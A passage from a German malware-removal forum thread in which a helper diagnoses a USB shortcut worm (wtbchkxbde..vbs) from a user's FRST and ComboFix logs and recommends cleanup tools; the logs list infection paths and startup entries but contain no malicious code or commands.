Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version: - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{99A0DB9A-71FC-4F98-BC1F-78A18195C677}) (Version: - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version: - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{1AA82E2E-7DB7-4C70-910C-BBB657A6B3A5}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0044-0407-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PROPLUS_{64D96F30-CF4C-4CCE-AAF2-F8909348BF35}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUS_{9F6507AC-7D8F-46C1-B90F-59C7828E0E0D}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2863818) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUS_{A9C4BE58-07E0-473D-AE68-ECBA13FBF77E}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version: - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version: - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version: - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version: - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0407-1000-0000000FF1CE}_Office14.PROPLUS_{6164E0E5-C903-488C-93AF-1B7AF7EBC331}) (Version: - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2553145) 64-Bit Edition (HKLM\...\{90140000-0018-0407-1000-0000000FF1CE}_Office14.PROPLUS_{BEA3259E-14B5-4D89-87FF-ED9F1D0D81C8}) (Version: - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2775360) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{BE1D254A-E5CD-4E76-9BE8-7B2E5FDBA6AF}) (Version: - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version: - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version: - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2810066) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DF33B92A-5381-4F03-AB54-2D67086B357E}) (Version: - Microsoft)
Update for Microsoft Word 2010 (KB2837593) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A82E26EF-680E-427D-B7D0-FD7997DDC217}) (Version: - Microsoft)
VLC media player 2.0.6 (HKLM\...\VLC media player) (Version: 2.0.6 - VideoLAN)
VR-NetWorld (HKLM-x32\...\{8815F011-43AF-4F50-BBD8-D78ED3D6F5B9}) (Version: - )
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinRAR 4.20 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
==================== Restore Points =========================
04-03-2014 03:23:52 Windows Update
04-03-2014 12:08:17 Windows Live Essentials
04-03-2014 12:11:06 Windows Update
04-03-2014 12:13:06 Windows Update
04-03-2014 12:13:55 DirectX wurde installiert
04-03-2014 12:14:27 DirectX wurde installiert
04-03-2014 12:15:14 DirectX wurde installiert
04-03-2014 12:16:48 WLSetup
14-03-2014 02:00:37 Windows Update
23-03-2014 22:56:32 Geplanter Prüfpunkt
==================== Hosts content: ==========================
2009-07-14 04:34 - 2014-02-25 18:48 - 00000853 ____N C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
Task: {1F2FE24C-4B0D-45D4-8B60-A98B45D048CA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.)
Task: {5ADA0D06-B2AE-41FA-B409-CCC39DFB0EF2} - System32\Tasks\{95AAC210-9BFE-40A9-AF62-1A23A8FF05C6} => Chrome.exe hxxp://ui.skype.com/ui/0/4.1.0.179.367/de/abandoninstall?source=lightinstaller&page=tsProblems&LastError=404&installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;notincluded
Task: {A375B6A6-9D4A-471F-A303-95C4CA7AD0FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {BBBBFC89-6720-42F2-9EB0-F18DE5DD0B9E} - System32\Tasks\{1035BE4D-F19C-4FDC-9E19-49D3A845A3FF} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=4.1.0.179.367&LastError=404
Task: {E072B638-8F77-4687-8C9B-4EA80C5B4038} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.)
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Loaded Modules (whitelisted) =============
2011-03-21 16:19 - 2011-03-21 16:19 - 00053248 _____ () C:\Program Files\NetLimiter 3\nlsvcPS.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-04-16 21:32 - 2011-10-26 17:41 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2013-04-16 21:32 - 2011-10-26 17:41 - 00126464 _____ () C:\Program Files\TeraCopy\TeraCopy64.dll
2010-03-26 10:41 - 2010-03-26 10:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2013-04-16 20:01 - 2013-04-16 20:01 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-04-16 21:58 - 2013-04-16 21:58 - 00397704 _____ () C:\Program Files (x86)\Avira\AntiVir Desktop\sqlite3.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-03-09 02:18 - 2010-03-09 02:18 - 00465576 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-03-09 02:13 - 2010-03-09 02:13 - 01081600 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2013-04-17 04:50 - 2009-05-21 00:02 - 00072200 _____ () C:\Program Files (x86)\Launch Manager\CdDirIo.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 00237384 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2014-04-02 08:03 - 2014-03-15 02:50 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_elf.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libglesv2.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libegl.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 04061000 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ffmpegsumo.dll
==================== Alternate Data Streams (whitelisted) =========
==================== Safe Mode (whitelisted) ===================
==================== Disabled items from MSCONFIG ==============
MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk => C:\Windows\pss\Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk.Startup
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: HP Officejet 4620 series (NET) => "C:\Program Files\HP\HP Officejet 4620 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN298240ZB05S1:NW" -scfn "HP Officejet 4620 series (NET)" -AutoStart 1
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (04/14/2014 10:31:23 AM) (Source: Application Hang) (User: )
Description: Programm VRNetWorld.exe, Version 5.1.0.12 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: fe0
Startzeit: 01cf57ba07163d71
Endzeit: 0
Anwendungspfad: C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe
Berichts-ID: 7c160182-c3ae-11e3-b796-00262dac37ec
Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272
Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25252272
Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258
Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25251258
Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244
Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25250244
Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
System errors:
=============
Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:47 AM) (Source: Disk) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.
Error: (04/14/2014 10:38:44 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:32 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:28 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Error: (04/14/2014 10:38:27 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.
Microsoft Office Sessions:
=========================
Error: (04/14/2014 10:31:23 AM) (Source: Application Hang)(User: )
Description: VRNetWorld.exe5.1.0.12fe001cf57ba07163d710C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe7c160182-c3ae-11e3-b796-00262dac37ec
Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272
Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25252272
Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258
Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25251258
Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244
Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25250244
Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second
CodeIntegrity Errors:
===================================
Date: 2014-03-05 15:59:48.934
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-03-01 13:30:45.600
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-03-01 13:30:33.518
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-03-01 13:25:21.861
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-03-01 12:27:05.166
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-02-28 14:14:30.022
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-02-28 14:14:25.270
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Memory info ===========================
Percentage of memory in use: 51%
Total physical RAM: 3764.43 MB
Available physical RAM: 1835.11 MB
Total Pagefile: 7526.99 MB
Available Pagefile: 4673.9 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB
==================== Drives ================================
Drive c: (ACER) (Fixed) (Total:452.97 GB) (Free:30.45 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 466 GB) (Disk ID: 59D459D4)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453 GB) - (Type=07 NTFS)
==================== End Of Log ============================
|
|
15.04.2014, 10:29
| #4 |
| /// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs Sticks anklemmen, nicht mehr abmachen. Panda USB Vaccine - Download - Filepony Das laufen lassen zum Absichern des Sticks. Scan mit Combofix
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
|
16.04.2014, 08:41
| #5 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs combofix.txt: Code:
ATTFilter ComboFix 14-04-12.01 - Franz 16.04.2014 2:59.1.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.49.1031.18.3764.1845 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Neuer Wiederherstellungspunkt wurde erstellt
.
.
(((((((((((((((((((((((((((((((((((( Weitere Löschungen ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Franz\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4270F4AC-2AD7-488D-8E81-BDC8F71DD41B}.xps
c:\windows\Temp\log.txt
c:\windows\wininit.ini
.
.
((((((((((((((((((((((( Dateien erstellt von 2014-03-16 bis 2014-04-16 ))))))))))))))))))))))))))))))
.
.
2014-04-16 01:14 . 2014-04-16 01:14 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-14 08:45 -------- d-----w- C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19 -------- d-----w- C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30 -------- d-----w- c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54 -------- d-----w- c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19 -------- d-----w- c:\programdata\Norton
2014-04-01 02:51 . 2013-09-22 15:47 73266 --sha-w- c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-01 02:51 . 2013-09-22 15:47 73266 ----a-w- c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 07:40 . 2014-03-25 07:40 -------- d-----w- C:\found.001
2014-03-21 05:44 . 2014-03-23 23:36 -------- d-----w- c:\users\Franz\AppData\Local\Microsoft Games
.
.
.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
(((((((((((((((((((((((((((( Autostartpunkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
